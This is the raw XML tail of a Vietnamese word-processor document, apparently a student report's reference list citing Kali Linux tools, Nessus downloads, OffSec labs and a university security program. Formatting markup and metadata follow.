    <w:p w14:paraId="69F4D8E4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[3] “Công cụ Kali | Công cụ Kali Linux”, Kali Linux. Truy cập: 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w: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Tháng Tư 2025. [Trực tuyến]. Có sẵn tại: https://www.kali.org/tools/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD722C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</w:p>
    <w:p w14:paraId="00199D7A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[4] “Tải xuống”. Truy cập: 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w: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>Tháng Tư 2025. [Trực tuyến]. Có sẵn tại: https://www.tenable.com/downloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37665666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</w:p>
    <w:p w14:paraId="2A31DD1F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[5] “Lỗi 404”. Truy cập: 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w: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Tháng Tư 2025. [Trực tuyến]. Có sẵn tại: https://www.tenable.com/downloads/nessus)?loginAttempted=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E980D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</w:p>
    <w:p w14:paraId="0A336FAC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[6] “Cơ sở chứng minh: Phòng thí nghiệm Pentesting ảo | Bảo mật tấn công”, OffSec. Truy cập: 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w: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Tháng Tư 2025. [Trực tuyến]. Có tại: https://www.offsec.com/labs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A7F73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</w:p>
    <w:p w14:paraId="2AC2EB99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[7] “Khoa Mạng máy tính và Truyền thông”. Truy cập: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>11</w:t>
      </w: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Tháng Tư 2025. [Trực tuyến]. Có tại: https://cit.ctu.edu.vn/mmt/ctdtattt.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E880261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</w:pPr>
    </w:p>
    <w:p w14:paraId="25A38A58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 w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman Regular" w:hAnsi="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> [8] https://samsclass.info/127/proj/ED203.htm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52769CF5"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Arial-BoldMT" w:cs="Times New Roman Regular"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E66A7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</w:p>
    <w:p w14:paraId="41C9258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</w:p>
    <w:p w14:paraId="110EF05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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CED120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</w:p>
    <w:p w14:paraId="6F26271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 w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29768972">
      <w:pP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</w:p>
    <w:p w14:paraId="01ABBFDD">
      <w:pP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</w:p>
    <w:p w14:paraId="75A694C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman Regular" w:hAnsi="Times New Roman Regular" w:cs="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="1109" w:gutter="0"/>
      <w:pgBorders w:display="firstPage">
        <w:top w:val="none" w:sz="0" w:space="0"/>
        <w:left w:val="none" w:sz="0" w:space="0"/>
        <w:bottom w:val="none" w:sz="0" w:space="0"/>
        <w:right w:val="none" w:sz="0" w:space="0"/>
      </w:pgBorders>
      <w:pgNumType w:fmt="lowerRoman"/>
      <w:cols w:space="0" w:num="1"/>
      <w:rtlGutter w:val="0"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Arial-BoldMT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TimesNewRomanPS-BoldMT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ArialMT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CourierNewPSMT">
    <w:panose1 w:val="02070609020205020404"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E0002AFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="400001FF" w:csb1="FFFF0000"/>
  </w:font>
  <w:font w:name="Calibri-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-ItalicMT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FDF42F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EEFDF42F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2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3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4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5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6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7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8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9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0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57F6C44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241FD001"/>
    <w:rsid w:val="379C2F11"/>
    <w:rsid w:val="6973F6E9"/>
    <w:rsid w:val="73B7038A"/>
    <w:rsid w:val="7B6F5DA1"/>
    <w:rsid w:val="7FF9C000"/>
    <w:rsid w:val="BFAF4C7D"/>
    <w:rsid w:val="F3DB58A4"/>
    <w:rsid w:val="F57F6C44"/>
    <w:rsid w:val="FBFFE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SimHei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15</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>0</CharactersWithSpaces>
  <Application>WPS Office_6.11.0.8608_F1E327BC-269C-435d-A152-05C5408002CA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2025-04-12T15:28:00Z</dcterms:created>
  <dc:creator>Nguyên Hồ Đình</dc:creator>
  <cp:lastModifiedBy>Nguyên Hồ Đình</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-11T09:00:52Z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1033-6.11.0.8608</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>71CC79972B01049A9BF1F767B8331A9A_41</vt:lpwstr>
  </property>
</Properties>
</file>